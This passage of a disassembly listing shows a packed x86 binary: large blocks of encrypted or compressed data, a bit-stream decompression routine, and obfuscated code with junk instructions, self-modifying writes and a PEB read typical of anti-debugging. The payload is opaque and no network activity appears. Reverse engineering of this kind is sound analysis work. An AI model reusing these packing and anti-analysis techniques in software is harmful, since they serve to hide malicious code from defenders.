		dd 776F6278h, 0EE33D7F4h, 8DEA25C0h, 0E02B10AEh, 0CE14E3Ch
		dd 585BE665h, 8F4DB8C9h, 0ACAC8AFBh, 1B810AD4h,	7836B773h
		dd 4A69FCF7h, 0E84ED9DBh, 0B5F65F7Ch, 7F4F77B3h, 6CD51C0Ch
		dd 85B1BB6Bh, 0D8E4AF93h, 0C89C53C1h, 577648DBh, 5FE70C6Dh
		dd 54AF5735h, 62A77AE3h, 33FB9D79h, 37FA2D60h, 5765293Ah
		dd 0C9E25DF4h, 64173E80h, 0F1B1F747h, 39F2897Bh, 0F662375Dh
		dd 0E258DB68h, 0C4C5F055h, 0EE811F77h, 97C980DBh, 0BC2FC1EBh
		dd 1A3817EEh, 5093925Eh, 0DA9A0D60h, 3C2A15D0h,	3520EC30h
		dd 6D1A8CFBh, 7F8981F5h, 2DB69770h, 59FE57F7h, 0C9B3F4D6h
		dd 10A144B9h, 91852771h, 0EE75973Bh, 0F1FBC4FBh, 986328EAh
		dd 12DA8EA5h, 6667ED13h, 3BD44ECDh, 0B19A0D55h,	7E09F0D3h
		dd 1A32D911h, 6003B3D9h, 3364A420h, 0AAB28E45h,	0D30A98D9h
		dd 1FBF3699h, 0E3E03591h, 2D1D55F7h, 0E2F0C171h, 5B38EC74h
		dd 0BB43A30Ch, 952E7C0Fh, 246F665Bh, 9A00ABB1h,	7156F5B1h
		dd 13031868h, 7A393EC3h, 70774069h, 352F0FC7h, 0F92A4C47h
		dd 649E06A2h, 0D6FBE8DEh, 37DB72AEh, 5E343D42h,	0F820501h
		dd 0B8A22926h, 79BD5EF7h, 0BE446217h, 92B45977h, 0AC2A0399h
		dd 0DD5F797Eh, 1A206135h, 0BD9F6837h, 0C48B2F12h, 7294E5A5h
		dd 2285EE0Fh, 85DA80AAh, 0F887F580h, 0FB313195h, 4D1B419Ah
		dd 4A0CFD2Dh, 17678FC3h, 0BCA04AB7h, 4223E926h,	0DCB35CE2h
		dd 0B3507875h, 0C99B07F5h, 0C0C2BFA2h, 90D48767h, 0AF17A775h
		dd 0D5AD312Ah, 0DF5403C6h, 0D1E6FA70h, 0CD386532h, 4CDA7F62h
		dd 7DD42AE8h, 0F1710E95h, 0A4668752h, 7DE82CBBh, 0C2A141A4h
		dd 7FD07E2Bh, 0C7B65260h, 6157231Eh, 0C464A79h,	6DC45A6Bh
		dd 6BBA1F8h, 0B5B3DD90h, 0BDFE495h, 4AB4C296h, 0A397C936h
		dd 85E4BA95h, 0CC349A7Ah, 3AE9CD61h, 0F4FAB5B4h, 73241A0Fh
		dd 0B0289EBAh, 898D5F3Bh, 0A4D1A325h, 0EB796A85h, 9844CC0Fh
		dd 0F07F218Fh, 8AF1CF43h, 5E07BCC8h, 0E0E0E6DCh, 999011D5h
		dd 0EA5188ECh, 9E340960h, 0DE710419h, 0AD045E1Bh, 3925517Fh
		dd 0A4FDDFCBh, 0D77EF6E0h, 0CCADFD64h, 24570978h, 9DEDD548h
		dd 5685F930h, 0DB629D29h, 1EA565BAh, 96FB703Dh,	0E5BAAEF7h
		dd 0FEDDF173h, 0A23AA08Bh, 6DA0D25Ah, 1F22312Fh, 0BFDBF1Bh
		dd 2A6DC47Eh, 2F94BD74h, 0D666FC0Ch, 0BE17885h,	36B05D8Ah
		dd 0F2CABE7Ch, 0B271DC7Ah, 2313C151h, 582AB98Bh, 30FAAD7Ah
		dd 772CE3CFh, 3246A693h, 4E022BC9h, 4CD5DA53h, 1045EC9Ch
		dd 17F48CBDh, 55B8CFC9h, 62E5C556h, 1934C6D5h, 0A97A661Fh
		dd 0F215E0CFh, 2B3A5C3Bh, 0D09B7223h, 0F469B551h, 0B342916h
		dd 0F225DE28h, 0B4E0D4CFh, 64A33A06h, 42993117h, 6784EAB7h
		dd 5BA96997h, 2B25A19Eh, 0BD74F2EFh, 0A807463Ah, 502F591Ch
		dd 643F861Ah, 95325B08h, 378D011Ch, 0AB466B72h,	4AA82C11h
		dd 34B2F7C4h, 9E6DB6D0h, 0AE2F4DFFh, 6B35BA24h,	44C9BAAEh
		dd 3D551430h, 0A5C54BACh, 0BD7208A3h, 95CED3BFh, 9DB69676h
		dd 0A9DED5F9h, 0E8FC822Dh, 6ADA66A7h, 8CB81BEh,	4240D701h
		dd 5318837Dh, 0A396E809h, 3233CBA8h, 59A867C5h,	32CD897Bh
		dd 0D1CAC3F5h, 4D0EDA30h, 44D75AB9h, 0CEDBDE19h, 303D653Bh
		dd 93258A4Ch, 63BDBE37h, 32D961B4h, 0EB12F45Ah,	0CCCB0154h
		dd 45F87413h, 0D52CAAC1h, 0AF04BE4Ch, 0C157FA33h, 85848CDEh
		dd 0CE0D8C2Bh, 0F3C13981h, 0C8F16DA2h, 0EE7DFABEh, 0A7D9C9D8h
		dd 0B444ECACh, 27AF6DD8h, 0DFEF9D7Ch, 2A8286C9h, 1ADB14C0h
		dd 0A4DC9A71h, 4BEFB12Fh, 238850E6h, 0B2742275h, 1574EAB7h
		dd 77D21B23h, 13572516h, 0CD2230ADh, 383C1079h,	75A18D4Bh
		dd 9FD5A876h, 31D9F399h, 0AAE9BA3Ch, 0CC5A80FCh, 2CEC1611h
		dd 4B49A844h, 2BC65123h, 932F231Bh, 4B5529A1h, 0BF12E1BFh
		dd 9A858945h, 0CCE08668h, 2465FBACh, 68FA670h, 9A3AF69Eh
		dd 0E61BC5DCh, 33EEBDE8h, 2112D181h, 9994EE72h,	0B37DCDB7h
		dd 518D22E3h, 8A35BC04h, 2ECCB74Fh, 342EBDF0h, 7ACC6C5Bh
		dd 5FB45678h, 0D493EDA0h, 0B034451Fh, 0C24BD175h, 4BD9B67Bh
		dd 0C5A90727h, 5A2C5E38h, 2AEE70E1h, 25A1A970h,	0AA93DD4h
		dd 3F0C8143h, 0A9AD7F70h, 0A47EA6D7h, 0C65A64D4h, 9A257C17h
		dd 0C0A68A04h, 0B035BD2Fh, 0B97F7D24h, 71051D96h, 0BBBD57DCh
		dd 0DB5CE04Ah, 81F14067h, 7BE25B79h, 75556325h,	6B04AA2Ah
		dd 0B10B5852h, 7BFB694Eh, 0B98AF3DDh, 4A3CBD8Ah, 0A144CAB7h
		dd 0CB641D53h, 0EACA911Fh, 4E06DD79h, 5F7B0669h, 6A3BBDB5h
		dd 0B96C9623h, 9A3BC504h, 50D7D8A7h, 0C91F9592h, 2B42D99h
		dd 0DD7F07C3h, 0C6E76C20h, 4211D1FFh, 32B72A4Bh, 0B0D8B8DFh
		dd 0EA3C41C4h, 0AFB5BAAAh, 0B568E03h, 44AC7D25h, 149AC6CAh
		dd 0FFCE8083h, 70CEE07Dh, 2DF0ADAEh, 0DFB090CFh, 46B0C5C1h
		dd 0D7DCB69Dh, 7DB23E3Ch, 0F1C7E292h, 0B89FD443h, 0C7ED346Bh
		dd 0BB011C5Fh, 0F5765D3Ah, 8AFF226h, 1ECD3A6Dh,	0B55EB2DEh
		dd 575B39A8h, 8A46D13Bh, 0B9D436B6h, 5E25A661h,	28827588h
		dd 0BF7A4B9Ch, 4DD43662h, 0BEF4E92Ah, 0BDCA9F82h, 0BD65DF3Ah
		dd 5A2D03C9h, 243116ABh, 2D73970Ah, 660670C5h, 0CF89FEAFh
		dd 79B9D250h, 4BC131ADh, 0BB08596Ah, 96F4353Ah,	42E2B5FBh
		dd 9FE9187Fh, 0B97D1BAh, 0F94FBB2Fh, 534ABD56h,	0C7D852A2h
		dd 0BA0BA339h, 33FC4FB9h, 3E46470Fh, 8D8A99AFh,	86E7CA83h
		dd 66B4BF5Dh, 66132968h, 24A1EBE2h, 0D8557424h,	0A5C0B407h
		dd 3320CE46h, 8C79A2FEh, 22EF5DA1h, 0AC2F353Eh,	0D169A07Ch
		dd 19FD3075h, 3F620B50h, 0CB2E2C9Dh, 0E5D3FFC8h, 9ADBB535h
		dd 0A36FB4B6h, 4F1C9A75h, 24AEB6EAh, 71D3464Eh,	0FD51E55Bh
		dd 0A8B90D79h, 9CE5094Eh, 0ADCCABAEh, 310559FBh, 0DF7A5AFBh
		dd 781FDE82h, 99CF72B2h, 8F3BB982h, 0A5616EC7h,	5D52FB66h
		dd 0F53E810Fh, 958B7F6Fh, 2F8E6812h, 0C2C98221h, 3B8DE999h
		dd 52114F0Ch, 671FBD8Ch, 0D80E70B7h, 0EC8E7C03h, 0B3B720F0h
		dd 0EA58198Eh, 0DD4327A6h, 78F4A137h, 1794FE35h, 0D4A2B27Dh
		dd 0A7A68635h, 57D92264h, 0BA9CFD4h, 84790143h,	0A33AD41Dh
		dd 8BFE5B7Fh, 65DE0621h, 60104C96h, 1DCD6F4Ah, 0C2BC766Dh
		dd 3435A871h, 45D7CB48h, 992E52BAh, 933A0FACh, 9A3FF8BCh
		dd 0C4B5A392h, 5288C8FAh, 0E2191A61h, 19259492h, 0FB331DADh
		dd 0FA78D7B0h, 395B5755h, 439BA7F7h, 0DC56FB57h, 0CDB11851h
		dd 0A51685F4h, 0CD7F5D60h, 9D68953Bh, 0D6FD7572h, 0F15D79ABh
		dd 0EBCB540Ch, 90664CA8h, 0D0611FDCh, 6ACA5BF3h, 600FD5EBh
		dd 7633C182h, 0BE3F6CB5h, 0A8EE9B42h, 8785436Ah, 2AA837D3h
		dd 7FD7A78Bh, 0B14FC7E3h, 0A94B71D3h, 21B54318h, 7F927DCCh
		dd 0FF45657h, 66F74E14h, 0F152C592h, 33D7E214h,	0D494AF68h
		dd 24069453h, 156528F3h, 0E795BC8Ch, 0AC9DAC6h,	0D72260B2h
		dd 953FDEC3h, 0E9A555C2h, 251CDE7Eh, 2EA477B2h,	5AB127AAh
		dd 97F88BECh, 12B8893Ah, 0D0936783h, 9E4CF4B8h,	6E114D13h
		dd 2FCE5956h, 26B7796Ch, 0C74AAD8Dh, 807F42EAh,	2AF541EDh
		dd 4CC465E2h, 776A00A3h, 0D5B68119h, 6D26EFA9h,	5C2B24CFh
		dd 48C4F7BAh, 522FCDBFh, 0C468F9D4h, 0B45B89AAh, 3245BFFCh
		dd 2C9C56FEh, 62CE8BFAh, 0D56F6574h, 0F4FD4787h, 0DCA59F97h
		dd 60BABCF2h, 6CA461A0h
		dd 6492351Bh, 22246E70h, 1C5719A7h, 0CF7CB54Fh,	8FDF58A3h
		dd 2031421Fh, 0A1BB7715h, 1A2C7AF6h, 85FF8C0Fh,	0E7F83896h
		dd 0C39C9BE4h, 37E41F53h, 55BE5952h, 0A46EED0h,	37126B55h
		dd 0C780B543h, 51118D07h, 8330C567h, 0C4AA97FCh, 905B97BAh
		dd 1D0AB3FFh, 6739C3Fh,	15CABA01h, 79E137Dh, 3D570F46h
		dd 91425277h, 201655D6h, 9CFE56C8h, 0F8AF53B1h,	0A3CB5A5Eh
		dd 98BF0C93h, 3A9D14FBh, 72FD1C15h, 0DE08A241h,	0AAE14A1Ch
		dd 0DBAF3CE3h, 10648A40h, 2B5EBC4Dh, 95914AF3h,	0E965001Bh
		dd 4C2DA1E9h, 0F232F858h, 8C501700h, 0F3CAD2F3h, 52A1075Dh
		dd 0FAB94E8Eh, 315368BFh, 0C07DBAC5h, 18E17BE7h, 9E054BFCh
		dd 218F3D19h, 97A5DF0Fh, 82467682h, 27A8C7E1h, 0EDD7E4ECh
		dd 9C1EC411h, 34EF934h,	411F42A4h, 89433280h, 756829EBh
		dd 0CB78F15Ch, 94A62C35h, 0F3FD04BDh, 1FDC550Ah, 38D8DF27h
		dd 0ADEE059Fh, 76FBBCBh, 9E17EE6Ah, 0FA892637h,	66377F00h
		dd 6B33D6B4h, 0FD0437CEh, 0C79F87DEh, 0E3969080h, 0DA1A0BE8h
		dd 0E79D96C9h, 0F7E2271Eh, 0BC750A3Bh, 0B7CCE921h, 2F906DEAh
		dd 781090C7h, 1DCE81C0h, 0FEE19955h, 2EE36D1Fh,	7B5FE63Eh
		dd 1D5430A9h, 0B461102h, 0CDEB54CAh, 0AFA26EBCh, 0DFFE7370h
		dd 14DE9749h, 56476F53h, 0C0050517h, 0B553EE95h, 6D1D7E9Eh
		dd 0D64EF917h, 0DEDF3BB5h, 87410F75h, 4ACC8C43h, 31EFABDEh
		dd 1FB4DFFEh, 88475F9Bh, 13E086B2h, 0FAB90152h,	4D1B5D03h
		dd 0DD917767h, 4DF38659h, 0F3D661FFh, 0FDC4C0A1h, 0FD9EA67Eh
		dd 772083EFh, 7AFD34F4h, 2B5DBD9Bh, 26CEC7B1h, 0E6FBFDA9h
		dd 6AEE49D7h, 96B89412h, 365A28A4h, 0F554FEC2h,	6B503696h
		dd 5F63AD91h, 6C33A3CFh, 0EB8C3CEAh, 0DD7C3397h, 8AF864Ch
		dd 4B2FCA53h, 0CE299402h, 0EA22A182h, 0B7850FB6h, 0C926CA70h
		dd 475C9F22h, 3ADA2AA3h, 329FE39Ch, 0D954FB84h,	78AED9Dh
		dd 55DA8B1Ah, 0FB8BF3ADh, 0EC509F8Bh, 98468102h, 220621F8h
		dd 0FEA13195h, 5D3ABB7h, 0DF8BFE35h, 68858CC5h,	6CDC8C5Ah
		dd 0AD6EC38Dh, 0D85CC12Fh, 0EA3436E1h, 80522DB5h, 2446ADFEh
		dd 0D8AED1E9h, 0CFAC7B36h, 0D4F02D24h, 0C9DBFF90h, 1E49E52Dh
		dd 2AC9EC2Bh, 9F9A32BBh, 9D1125C0h, 0AEF9C7C4h,	0ADF8FCD7h
		dd 471BFEC6h, 0BAB31E3Eh, 0E3EA9BF0h, 2181BEC3h, 81D6823Ah
		dd 0CD93F57Ch, 4CD2768Eh, 1B2E46EDh, 0F31B8164h, 15F6862Fh
		dd 6371EFEEh, 0BE5FF653h, 355873C2h, 98A06468h,	95420B3Bh
		dd 5BAB323h, 3B7885C5h,	7E3ECBA4h, 5D97A4FFh, 0DBB1C6FBh
		dd 5411BC25h, 0A652F8D5h, 0CE0CBA72h, 19759259h, 215AFC1Dh
		dd 0EE56E7B1h, 0C6474DEAh, 60DF18AAh, 48C59B2Ch, 8BC74938h
		dd 0F95430D6h, 2C679E13h, 57589D88h, 1418BD69h,	0ED541536h
		dd 0D543B2C9h, 0D52BE570h, 57885B3Fh, 885643FFh, 334A0E9Eh
		dd 7F71EA95h, 958B9351h, 5231A5B2h, 9E464F5h, 0EB5C285Bh
		dd 0B744A782h, 61E7E7FAh, 68965748h, 0DEE05D03h, 57FA0967h
		dd 93BDAB7Ah, 5366D83Dh, 905A82D7h, 41A0A36Bh, 0D7CB3AD7h
		dd 0BE22D3FFh, 0FCA5488Eh, 0DDD135A6h, 0B28CBACCh, 52A7FCB4h
		dd 0DCA1D3C1h, 9B03D1DFh, 0E02F8DF5h, 9D9E1DBh,	0D644D31Eh
		dd 0C332114Bh, 0FD0A9679h, 2DDCA5FCh, 44FBB76Fh, 8329150Bh
		dd 9CBEB9CAh, 17B7FB96h, 32E6B79Ch, 77BC7BDBh, 12CDECA5h
		dd 15E6FBA1h, 424157D0h, 2BB22BDh, 27440A0Ch, 0C84BEF53h
		dd 2D22C2AAh, 0C32A4FE8h, 72F9106Bh, 8D844D4Eh,	365B4699h
		dd 393C4F6Fh, 83EED0ACh, 0AE1D3F1Bh, 14D742Bh, 0B0D3B1DFh
		dd 9ED91B98h, 328535C9h, 84E77931h, 0CD46A2AAh,	74AF5E97h
		dd 8A020DC3h, 70C72ADBh, 0FF0DED56h, 0D839B10Eh, 61441F66h
		dd 6B4F9BA7h, 9F17A955h, 0CFB93617h, 65A9C55Dh,	0EC552B02h
		dd 28BFC0F2h, 98E45A3Fh, 83FE0F35h, 0AA697402h,	0CA63BA80h
		dd 97F05F13h, 0CFD7CBC0h, 0A9324165h, 78985D82h, 2FB26248h
		dd 1702DF8Ch, 99B3AEA3h, 0F1D76DA1h, 0FE70D773h, 6B6EAA65h
		dd 98901BC6h, 8C66060Ch, 0CD069978h, 0E992EBF7h, 30BE2606h
		dd 29A6B56Eh, 4AAF811Bh, 11B3D30Ah, 0C6B09E06h,	0F8EEB12Eh
		dd 3BD8CED4h, 0A543B070h, 0CA22B5D3h, 0A79AF07Ch, 4D57EE58h
		dd 0FA8926EAh, 4A33FAE2h, 0AA63376h, 42F37ADEh,	6ED82D46h
		dd 0B0315B24h, 65BA8DBCh, 7ACDD652h, 23583D73h,	5F8FACC5h
		dd 0AE37FF8Dh, 79D86F37h, 721A6987h, 736B8E26h,	73A7A465h
		dd 0F0976C15h, 1102EA85h, 314BAA03h, 7CA17076h,	5BD1B6B9h
		dd 0D238F818h, 0A73710CBh, 8EFDD690h, 2C031615h, 1273D3B3h
		dd 63F0C66Bh, 0F879C557h, 7B54E766h, 310342FEh,	0F7FC0A13h
		dd 5E330DCFh, 58CEB62Bh, 72088399h, 0BF76A35Eh,	0D5CF7DD5h
		dd 0ABB486FBh, 0C6BF5188h, 33648893h, 0EA44FA97h, 5415C520h
		dd 2BEEE68Eh, 0ACA782Ah, 7EAF05B0h, 0A89F9FFh, 2AC10785h
		dd 0E2B09C37h, 0A34CEEFFh, 0EA96EF4h, 0D7B37BA1h, 8A6DD0A5h
		dd 1F3A5AADh, 22F88EC0h, 0A23A6DC8h, 0CDF972AAh, 35B75C4Ah
		dd 10D22874h, 0EA1B788Ah, 8F9998BCh, 0F35CAB35h, 0DF0C68E5h
		dd 9DC21592h, 0A5DF6918h, 0C9752E19h, 61AFBC2Ah, 7C99384h
		dd 0CE4229FDh, 0DD09D13Fh, 0AF70ACB3h, 397D1AB0h, 1F713722h
		dd 1DFBB9ECh, 8EB942ADh, 0A07BF52h, 0F81AEE96h,	5177BF3Ah
		dd 2916B755h, 29A3347Eh, 9DF9B157h, 901A91EEh, 0A7D137ACh
		dd 74D5FC57h, 2468C465h, 6288461Ah, 0FD8E86D5h,	1BCEC066h
		dd 1165A7F1h, 0F3025A6Ah, 47359CCAh, 0CE74ED3Ah, 59FB8891h
		dd 0DC5CAE07h, 172B43F1h, 0FD680332h, 7C37E72Ah, 6D880BF2h
		dd 52A46E47h, 0C4E7F2DDh, 6A5B4117h, 0CBB6B0B3h, 4C7B226Dh
		dd 415FB6A3h, 0C115101Eh, 2059815Fh, 1E66D183h,	0DD91CC4Ch
		dd 0E927EC74h, 0C9591CC7h, 0E1D54138h, 0A16833F8h, 973F196Ah
		dd 0A94CECDCh, 0ED3C56EFh, 0AC67A493h, 0E7957C57h, 0DAF989C1h
		dd 3FCD5C82h, 3BE95817h, 502BBAA1h, 0F58DF07Ch,	555F46A5h
		dd 0F8B394B6h, 17D4CA06h, 44D2057h, 0FD993C6Eh,	0C2428E32h
		dd 87E1B0E2h, 82711B58h, 4B3A8E2Eh, 5582C0D2h, 982C0A25h
		dd 0A410CA05h, 0C46D9DDEh, 27879C3Ah, 0F679713Bh, 32872F31h
		dd 6627DFA3h, 5BED7CFAh, 0DB4E4B7Dh, 0D67695Dh,	5FC13D13h
		dd 0E5E792F0h, 36BE5BDCh, 0B4460A31h, 0AF6BA556h, 2FF7FFC4h
		dd 8E7BD1F1h, 449EC557h, 0AD21A3C1h, 72BFDBD9h,	24872858h
		dd 289C0FDBh, 0EE74D253h, 3BF9A15Dh, 11D8BA83h,	0D1509B84h
		dd 51D88B78h, 9795C1E1h, 0C04AD52Dh, 75CC1A06h,	0D687F8D8h
		dd 0DC2502BBh, 2921D8DAh, 7A4CBCD7h, 0CE0F2549h, 8767B97Ch
		dd 0D7DD2A07h, 9F58A108h, 223F903h, 8A531ECFh, 70F5EB13h
		dd 1E573407h, 6E856CE3h, 0CDA0C694h, 9E16042Fh,	5FBB6574h
		dd 0BFCC8A92h, 22BC255Ch, 0E1421D40h, 0B5C2BA4Ch, 0F7416CA5h
		dd 136B29C1h, 5D229D7Bh, 8B7C9715h, 86012AA1h, 0F95E24ADh
		dd 0CDA374EEh, 6E4938AAh, 61E69EBAh, 109C5FB0h,	9F094C73h
		dd 3180CABFh, 0C8D65C83h, 4ED167F2h, 61250D2Dh,	5751A7C5h
		dd 23A6A24Bh, 5D80FD4Ah, 2E899C6Bh, 19CBFBEBh, 773049EAh
		dd 1D244657h, 698F5750h, 0F50B8FCDh, 0DFE8C9ECh, 92AABD9Dh
		dd 68A12119h, 0F42ADA39h, 7F16B5Dh, 59AAA9EEh, 0D5B7BFA5h
		dd 3EA9ED8Eh, 9D2FFD1Bh, 0E21E5A2Ch, 0DE7626DDh, 0D65CFD9Bh
		dd 7EAEE415h, 1BC1AF14h
		dd 85FCB4CEh, 7F76CFF2h, 0B848DF3Eh, 7C1500Eh, 5368E31Bh
		dd 64967611h, 4A35AA1Dh, 302AEEA6h, 0BA57F763h,	0BF7B99B1h
		dd 0B754D831h, 0B187837Ah, 7A747CD2h, 0E422E1B1h, 0FB7E48Fh
		dd 0F0509B9Ch, 0AB8E71Eh, 0DE7F1FDBh, 0BFBE78B3h, 8096D43Ah
		dd 1B207D09h, 0D71E29D9h, 52E1D68Bh, 7DB54F55h,	8FF39E6h
		dd 0A67792FFh, 2906D699h, 40D558FCh, 5BB03ECBh,	5D00B1AAh
		dd 4681AFA3h, 0D287C1ABh, 0CC07699h, 0ED1D2F62h, 893CA5Fh
		dd 3C87667Eh, 8E73DC1Ah, 96F25F8Fh, 77B4A988h, 0A215FD87h
		dd 0D865ADF6h, 6284h, 3B84000h,	2
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_488612	proc near		; DATA XREF: sub_48E128+3Ao

var_11		= byte ptr -11h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00488791 SIZE 00000004 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cld
		push	ebx
		push	edi
		push	esi
		mov	[ebp+var_4], eax
		mov	[ebp+var_8], edx
		mov	esi, eax
		mov	edi, edx
		cmp	word ptr [esi],	434Ah
		jnz	loc_488754
		add	esi, 0Ah
		mov	[ebp+var_C], 8
		xor	ebx, ebx
		mov	edx, 80000000h
		inc	ebx

loc_488643:				; CODE XREF: sub_488612+46j
					; sub_488612+8Dj ...
		xor	eax, eax
		call	sub_48875B
		jnb	short loc_48865A
		mov	ecx, [ebp+var_10]
		call	sub_488773
		add	al, [ebp+var_11]

loc_488657:				; CODE XREF: sub_488612+65j
		stosb
		jmp	short loc_488643
; ---------------------------------------------------------------------------

loc_48865A:				; CODE XREF: sub_488612+38j
		call	sub_48875B
		jb	loc_4886FC
		call	sub_48875B
		jnb	short loc_4886C7
		mov	ecx, 4
		call	sub_488773
		dec	eax
		jz	short loc_488657
		jns	loc_488746
		call	sub_48875B
		jnb	short loc_4886A1
		push	ebp

loc_488687:				; CODE XREF: sub_488612+8Aj
		mov	ebp, 100h

loc_48868C:				; CODE XREF: sub_488612+83j
		call	sub_488768
		mov	[edi], al
		inc	edi
		dec	ebp
		jnz	short loc_48868C
		call	sub_48875B
		jb	short loc_488687
		pop	ebp
		jmp	short loc_488643
; ---------------------------------------------------------------------------

loc_4886A1:				; CODE XREF: sub_488612+72j
		mov	ecx, 1
		call	sub_488773
		add	eax, 7
		mov	[ebp+var_10], eax
		mov	[ebp+var_11], 0
		cmp	eax, 8
		jz	short loc_488643
		call	sub_488768
		mov	[ebp+var_11], al
		jmp	loc_488643
; ---------------------------------------------------------------------------

loc_4886C7:				; CODE XREF: sub_488612+58j
		mov	ecx, 7
		call	sub_488773
		push	eax
		mov	ecx, 2
		call	sub_488773
		mov	ecx, eax
		inc	ecx
		inc	ecx
		pop	eax
		or	eax, eax
		jz	short loc_4886E9
		mov	ebx, eax
		jmp	short loc_488747
; ---------------------------------------------------------------------------

loc_4886E9:				; CODE XREF: sub_488612+D1j
		cmp	ecx, 2
		jz	short loc_488754
		inc	ecx
		call	sub_488773
		mov	[ebp+var_C], eax
		jmp	loc_488643
; ---------------------------------------------------------------------------

loc_4886FC:				; CODE XREF: sub_488612+4Dj
		call	sub_48877F
		dec	ecx
		loop	loc_48870D
		mov	eax, ebx
		call	sub_48877F
		jmp	short loc_488747
; ---------------------------------------------------------------------------

loc_48870D:				; CODE XREF: sub_488612+F0j
		dec	ecx
		mov	eax, ecx
		push	ebp
		mov	ecx, [ebp+var_C]
		mov	ebp, eax
		xor	eax, eax
		shl	ebp, cl
		call	sub_488773
		or	eax, ebp
		pop	ebp
		mov	ebx, eax
		call	sub_48877F
		cmp	eax, 10000h
		jnb	short loc_488744
		cmp	eax, 37FFh
		jnb	short loc_488745
		cmp	eax, 27Fh
		jnb	short loc_488746
		cmp	eax, 7Fh
		ja	short loc_488747
		inc	ecx

loc_488744:				; CODE XREF: sub_488612+11Cj
		inc	ecx

loc_488745:				; CODE XREF: sub_488612+123j
		inc	ecx

loc_488746:				; CODE XREF: sub_488612+67j
					; sub_488612+12Aj
		inc	ecx

loc_488747:				; CODE XREF: sub_488612+D5j
					; sub_488612+F9j ...
		push	esi
		mov	esi, edi
		sub	esi, eax
		rep movsb
		pop	esi
		jmp	loc_488643
; ---------------------------------------------------------------------------

loc_488754:				; CODE XREF: sub_488612+19j
					; sub_488612+DAj
		mov	eax, esi
		pop	esi
		pop	edi
		pop	ebx
		jmp	short loc_488791
sub_488612	endp


; =============== S U B	R O U T	I N E =======================================



sub_48875B	proc near		; CODE XREF: sub_488612+33p
					; sub_488612:loc_48865Ap ...
		add	edx, edx
		jnz	short locret_488767
		mov	edx, [esi]
		add	esi, 4
		stc
		adc	edx, edx

locret_488767:				; CODE XREF: sub_48875B+2j
		retn
sub_48875B	endp


; =============== S U B	R O U T	I N E =======================================



sub_488768	proc near		; CODE XREF: sub_488612:loc_48868Cp
					; sub_488612+A8p
		mov	ecx, 8
		call	sub_488773
		retn
sub_488768	endp


; =============== S U B	R O U T	I N E =======================================



sub_488773	proc near		; CODE XREF: sub_488612+3Dp
					; sub_488612+5Fp ...
		xor	eax, eax

loc_488775:				; CODE XREF: sub_488773+9j
		call	sub_48875B
		adc	eax, eax
		loop	loc_488775
		retn
sub_488773	endp


; =============== S U B	R O U T	I N E =======================================



sub_48877F	proc near		; CODE XREF: sub_488612:loc_4886FCp
					; sub_488612+F4p ...
		xor	ecx, ecx
		inc	ecx

loc_488782:				; CODE XREF: sub_48877F+Fj
		call	sub_48875B
		adc	ecx, ecx
		call	sub_48875B
		jb	short loc_488782
		retn
sub_48877F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488612

loc_488791:				; CODE XREF: sub_488612+147j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_488612
; ---------------------------------------------------------------------------
		align 2
word_488796	dw 800Fh		; DATA XREF: sub_48E122o
					; sub_48E128+29o
		dd 3D89h, 2CD38A0Fh, 3C870000h,	240C8724h, 4713E9h, 0C3000000h
		dd 8DE90000h, 1Dh, 183E9h, 0C6000000h, 81588700h, 0CCB1FE8h
		dd 7CF08129h, 0E9BE724Dh, 2961h, 7C60000h, 7EE85F85h, 52000009h
		dd 56D4E9h, 907C600h, 58B645Fh,	30h, 6854C083h,	48A166h
		dd 0FF4E9h, 33000000h, 8CCA81F7h, 81F7D362h, 0E1D05BD2h
		dd 72E9992Dh, 36h, 0FD599968h, 0C08158B0h, 88B524E8h, 521FC0C1h
		dd 48D4B2BAh, 508BE900h, 0

; =============== S U B	R O U T	I N E =======================================



sub_488830	proc near		; CODE XREF: sub_48C9A0:loc_488AF4p
					; _3gijy9nr:00489747j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004897E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489DFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C5E4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048DD8F SIZE 00000009 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	byte ptr [eax],	0C3h
		xchg	ebp, [esp-4+arg_0]
		sbb	eax, 0ADADBDB3h
		jmp	loc_4897E0
sub_488830	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
		jno	loc_48A2E9
		mov	eax, large fs:30h
		push	ecx
		push	6BC36BB3h
		jmp	loc_48A8CF
; ---------------------------------------------------------------------------
		dd offset aDelete_0+4
		align 4
; START	OF FUNCTION CHUNK FOR sub_48ADE6

loc_488864:				; CODE XREF: sub_48ADE6+20j
		jmp	loc_48BD45
; END OF FUNCTION CHUNK	FOR sub_48ADE6
; ---------------------------------------------------------------------------
		jo	loc_489556
		xchg	ebx, [esp]
		pop	ebx
		push	817CEFh
		pop	ebx
		rol	ebx, 4
		and	ebx, 0FACFD2Fh
		jmp	loc_489E7F
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_488888	proc near		; CODE XREF: sub_48B609:loc_48BC3Ap
					; sub_48B609+2295j

; FUNCTION CHUNK AT 0048A5C8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048A676 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048B362 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CAAA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048D515 SIZE 00000017 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	byte ptr [ecx],	9Ch
		pop	ecx
		or	eax, 6BBC0117h
		call	loc_48BC6F

loc_48889B:				; CODE XREF: sub_48D55D+Aj
		jmp	loc_48D515
sub_488888	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0C870000h, 0BF575924h, 489C58h, 2714E9h, 0DA810000h
		dd 0F158CC5Fh, 3BD7E9h,	0C1000000h, 3AE915C9h, 1Bh, 0C18B5000h
		dd 68240487h, 0BBCFC0B3h, 35C98159h, 0E9DEF561h, 14E4h
		dd 4F53E9h, 0B6486800h,	0F4E90048h, 0Ah, 685FD78Bh, 48D3C9h
